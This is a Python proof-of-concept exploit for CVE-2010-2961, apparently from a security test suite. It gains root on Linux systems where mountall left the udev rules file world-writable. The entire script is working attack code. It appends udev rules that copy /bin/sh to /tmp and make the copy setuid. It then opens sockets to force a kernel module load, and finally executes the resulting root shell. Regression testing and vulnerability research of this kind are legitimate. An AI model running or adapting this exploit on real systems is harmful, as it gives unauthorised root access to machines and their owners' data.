#!/usr/bin/env python
# Copyright 2010 Canonical, Ltd
# License: GPLv3
# Author: Kees Cook <kees@ubuntu.com>
#
# CVE-2010-2961
#
# Exploits a udev rule file left world-writable by mountall, triggering udev
# to run arbitrary commands.
import sys, os, subprocess, socket, tempfile, time

# Append malicious udev rule
open("/dev/.udev/rules.d/root.rules","a").write('''
SUBSYSTEM=="module", RUN+="/bin/cp /bin/sh /tmp/toor"
SUBSYSTEM=="module", RUN+="/bin/chmod ug+s /tmp/toor"
''')

# Attempt to trigger a module load event
loaded = False
before = open("/proc/modules","r").read()
for af in range(40):
    try:
        s = socket.socket(af, socket.SOCK_STREAM, 0)
    except:
        pass
    if before != open("/proc/modules","r").read():
        loaded = True
        break

if not loaded:
    print "Failed to trigger a module load through sockets, try something else"
    sys.exit(1)

for i in range(50):
    if os.path.exists("/tmp/toor"):
        os.execv("/tmp/toor",['sh'])
    time.sleep(0.1)

print "Hmpf, udev didn't notice the new rule"
sys.exit(2)